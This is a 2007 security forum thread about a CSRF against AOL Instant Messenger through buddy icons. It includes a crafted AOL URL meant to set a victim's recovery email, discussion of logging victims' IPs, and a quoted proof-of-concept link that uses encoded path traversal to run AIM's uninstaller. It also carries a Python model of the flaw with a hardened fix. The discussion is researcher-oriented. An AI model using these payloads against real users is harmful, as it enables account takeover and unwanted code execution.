AOL Instant Messenger CSRF
Date: February 25, 2007 04:16PM

I discovered the original exploit of using the AOL Instant Messenger buddy icon to execute scripts and things more than 3 years ago, but since then I've played around with it a little every few months. In the last installment I discovered that using image tags within the buddy icon could actually call up a remote site, which helped me create a PHP script to log User-Agents and IPs via the AIM buddy icon without a connection. Today I believe I've found a new hole within the system.
The only discrepancy is that the user on the receiving end needs to have never confirmed the email address to their account, and must be using a version of AIM which allows them to remain logged in to the AIM network (AIM Today, and the rest of those shitty features) at all times. A simple GET request to "https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=my.screenname.aol.com&lang=en&locale=us&mcState=doEmailNag&newEmail=YOUREMAILHERE&nag=newEmail" via the buddy icon should send an email to your specified address awaiting a confirmation. If I didn't explain it well enough it's because I'm in a hurry as my girlfriend wants me off the computer, and wants me to grill up some chicken.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/



Edited 1 time(s). Last edit at 02/25/2007 04:16PM by Awesome AnDrEw.

Re: AOL Instant Messenger CSRF
Posted by: dero
Date: February 28, 2007 08:13PM

This is quite interesting, although I can't seem to get it to work. I'm assuming the original idea was to confirm the victim's e-mail address, which is actually yours, so in turn you should be able to request a lost password and hopefully receive theirs or a temporary password. Everything seemed to go okay until I got an alert box telling me that the next time I log in I would have to confirm my e-mail address.

"You are no longer signed onto Screen Name Service. You will be prompted to confirm your e-mail address the next time you login"

But I haven't been able to log into my Web account because I don't know the answer to one of my security questions, which I just discarded when I registered. I'm going to play around with this for a while with different accounts. But it looks like the e-mail address you submit has to be confirmed upon next login.

Re: AOL Instant Messenger CSRF
Posted by: rsnake
Date: February 28, 2007 09:35PM

Yah, stop grilling chicken and walk us through the steps, damnit! :)

- RSnake
Gotta love it. http://ha.ckers.org

Re: AOL Instant Messenger CSRF
Posted by: id
Date: February 28, 2007 10:12PM

Screw that, invite us over for some chicken!

-id

Re: AOL Instant Messenger CSRF
Posted by: bubbles
Date: March 01, 2007 08:43AM

and beer!

-bubbles
http://webmastertutorials.net

Re: AOL Instant Messenger CSRF
Posted by: jungsonn
Date: March 01, 2007 11:47AM

Ghehe... uhm. Yeah!

Re: AOL Instant Messenger CSRF
Date: March 01, 2007 02:03PM

Okay, this should work, because it worked for me with the GET request, but like I said, there are some discrepancies which may contribute to this failing.

Discrepancies I know about:
-Attacker must be using a version of AIM which supports non-graphical buddy icons such as sounds, commands, script, or HTML injected ones. I use 4.3.2229 (it's not vulnerable to any AIM crashes).

-Victim must be using a version of AIM, which allows them to remain logged into the AIM and AOL network at all times, and they must have this enabled (obviously the request wouldn't work if this was disabled).

-Victim must not have already confirmed the email address to their account.

-Victim must accept buddy icons.

With all those things set correctly, an HTML padded buddy icon calling on "https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=my.screenname.aol.com&lang=en&locale=us&mcState=doEmailNag&newEmail=YOUREMAILHERE&nag=newEmail" should yield a viable flaw.

For details on how to use the buddy icon as a CSRF visit this page http://awesomeandrew.net/index2.php?content=aimdataminer, and download the file (which is an example on how to use the buddy icon to steal a victim's IP simply by IMing them, and having their computer request a PHP file from a remote site).

EDIT: If anyone wants to hop on AIM, and setup themselves as the victim we'll be able to verify everything works here.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/



Edited 1 time(s). Last edit at 03/01/2007 02:10PM by Awesome AnDrEw.

Re: AOL Instant Messenger CSRF
Posted by: dero
Date: March 01, 2007 05:56PM

I'll hop on AIM and test it out with you. I'm running 5.9.6089, the version that is vulnerable to the font crash. And I wouldn't mind testing out older or newer versions either. My AIM screen name is dudegetoffaim

Re: AOL Instant Messenger CSRF
Posted by: rsnake
Date: March 01, 2007 10:41PM

Can you CSRF anything? Meaning can you cause someone on AIM to de-anonymize?

- RSnake
Gotta love it. http://ha.ckers.org

Re: AOL Instant Messenger CSRF
Posted by: dero
Date: March 02, 2007 12:03AM

Ehh, to an extent. Really you can't get any information on the person from just having them visit the link or being forced to via buddy icon. All this does is just set up an e-mail address to send forgotten passwords to, because AIM doesn't force you to verify your e-mail address or even ask you for one. Most users just skip the whole thing or enter their information (e-mail address), to which an e-mail is then sent requesting verification. But verification is not required for you to use your newly registered AIM screenname. So in theory this would allow you to submit a new e-mail address for any user that has not verified their e-mail address, which would allow you to confirm a place to send confidential information to. But from what I've tested so far, once you submit your newly appointed e-mail address, it waits for confirmation from the user to make sure this is the new address to which information should be sent, thus rendering this whole thing useless. The whole idea was to have the password, but this request has to be verified with someone who knows the password.

Or I could be completely wrong, I have yet to test this with the main man.
More 1999 AOL phishing in the future?
Most likely not.

Re: AOL Instant Messenger CSRF
Date: March 02, 2007 12:04AM

I played around with that a little the other day, but it does not seem to recognize its own "aim" protocol, or javascript, but you can insert HTML in the icon, and create a text link which accesses the protocol, but that'd rely on curious users. As I discovered in 2004 the icons are also vulnerable to being used as script, or batch files, because some versions of AIM are always installed in the same directory, and so therefore links using the "%n" attribute (it's replaced with the viewer's screenname) in the user profile help target specific directories where the icon can be executed from. With those combined you can script in the AIM protocol to get the desired effect [set the away message, add buddies, add groups, open an IM (which could contain a font crash overflow string that would immediately cause the user's client to error), et cetera]. I'm on the Wii right now, but I suppose at a later time I could write a complete and comprehensible guide to using the icons.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: AOL Instant Messenger CSRF
Date: March 02, 2007 12:08AM

Rsnake, that can be circumvented by a new exploit found by another person using "AIM Phone". His URL allows it to be done without confirmation, making the overall hole still viable, but again I'm on the Wii so I cannot get the URL at this moment.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: AOL Instant Messenger CSRF
Posted by: dero
Date: March 02, 2007 12:20AM

How's typing on a Wii? I'm on AIM if you'd like to test.

Re: AOL Instant Messenger CSRF
Date: March 02, 2007 12:24AM

Okay, the site's down right now, but I grabbed the cached version of it from Google. Apparently you can't update the email address online without verification, but there's another exploit which shows the new AIM doesn't parse links correctly, and ends up executing files (which helps you on your quest to affect more aspects of AIM).

The email exploit found by aliptix can be found here when his site comes back online: http://www.aliptix.net/site/files/articles/emailexploit.txt

Below is the documentation on how AIM parses HTML links.

Quote

Originally found by aliptix

By exploiting how AIM 6.0 parses and runs links, you can force AIM to uninstall itself without a confirmation,
using a simple link.

AIM 6.0 does not protect against having files executed from links. You could send
click me and as soon as they click it they will shut
down. Now for this to work you need to know the windows version and the drive they are running AIM on,
so how would this be an exploit? Read on.

A Brief Description of How This Exploit Works:
When sending links, if you include a colon in the URL, AIM automatically adds the path to the
imApp/[version]/content/im directory of AIM.

Example:

Send:

Code (html)
<a href="http://www.haxt.net/v6/:">a</a>

AIM Replaces This With:

Code (html)
<a title=":" href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:">a</a>

After Changing the Directory:

Code (html)
<a title=":" href="file:///c:/aim6%20test/services/imApp/ver6_0_28_1/content/im/:">a</a>

So, as you can see, a simple colon will throw in the drive, path of the im folder, then tack on that colon.

You can add things after the colon to change the URL, so if you send

Code (html)
<a href="http://www.haxt.net/v6/hey.html">a</a>

You Get:

Code (html)
<a title=":" href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:/hey.html">a</a>

So why not try directory traversal to run files since a colon supplies the path we need?
Well, AOL thought of this, and decided to filter it out, but I don’t see why since you could just use
file:c:/windows/system32/logoff.exe or a direct path to another file you wanted to run, and that
won’t get filtered.

So since /.. or even /. gets filtered out of our URLs we have to use hex encoded /../’s


Proof of Concept Send:
This will uninstall AIM by the click of a link without a confirmation and without having to know the install
drive or path, although you are limited to basically running just the files in the AIM install folders.

This is assuming that the uninstall.exe is still in the same place as normal.
For me this is Drive:\main AIM directory\uninstall.exe

Code (html)
<a href="http://www.haxt.net/v6/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/uninstall.exe">click!</a>

For more information, aliptix.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/
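
The filter-ordering flaw in the quoted write-up (the "/.." filter runs on the still-encoded link, so %2E%2E survives), modelled here as an added example that is not code from the thread, from AOL or from aliptix. The base directory, the ":" component and the version segment are assumptions taken from the quoted href examples; the legacy resolver is a constructed model of the described behaviour, and the hardened one shows the fix: decode until stable, canonicalise, then enforce the directory boundary on the final path.

```python
from typing import Optional
from urllib.parse import unquote
import posixpath

# Assumed base directory (modelled on the quoted href examples; the version
# segment is a placeholder, not a real AIM build).  The client tacks a ":"
# component onto it and then appends whatever followed the host in the link.
BASE = "/c:/program files/aim6/services/imApp/VERSION_PLACEHOLDER/content/im"


def legacy_resolve(link_path: str) -> str:
    """Vulnerable order of operations (constructed to mirror the write-up):
    strip "/.." and "/." from the still-encoded path, decode afterwards,
    then let the file handler canonicalise.  Encoded dots pass the filter."""
    filtered = ("/" + link_path).replace("/..", "").replace("/.", "")
    return posixpath.normpath(BASE + "/:" + unquote(filtered))


def hardened_resolve(link_path: str) -> Optional[str]:
    """Decode until stable (defeats double encoding such as %252E), then
    canonicalise, then enforce the directory boundary on the final path.
    Returns None when the link would resolve outside BASE."""
    decoded = "/" + link_path
    while True:
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    candidate = posixpath.normpath(BASE + "/:" + decoded)
    if candidate != BASE and not candidate.startswith(BASE + "/"):
        return None
    return candidate
```

The legacy resolver blocks a plain "../" chain but lets the percent-encoded form from the write-up climb out to the install directory; the hardened one rejects both, and the double-encoded variant as well.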

Re: AOL Instant Messenger CSRF
Date: March 02, 2007 02:13AM

Let's just call this one a wash for now. There are obviously some more incompatibilities that need to be addressed, because when we tried it my normal icon didn't even appear.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: AOL Instant Messenger CSRF
Posted by: kirke
Date: March 24, 2007 05:38AM

a bit off-topic to this thread, anyway:
http://sla.ckers.org/forum/read.php?3,44,page=42#msg-8824

there you probably can mount website spoofing using XSS ;-)
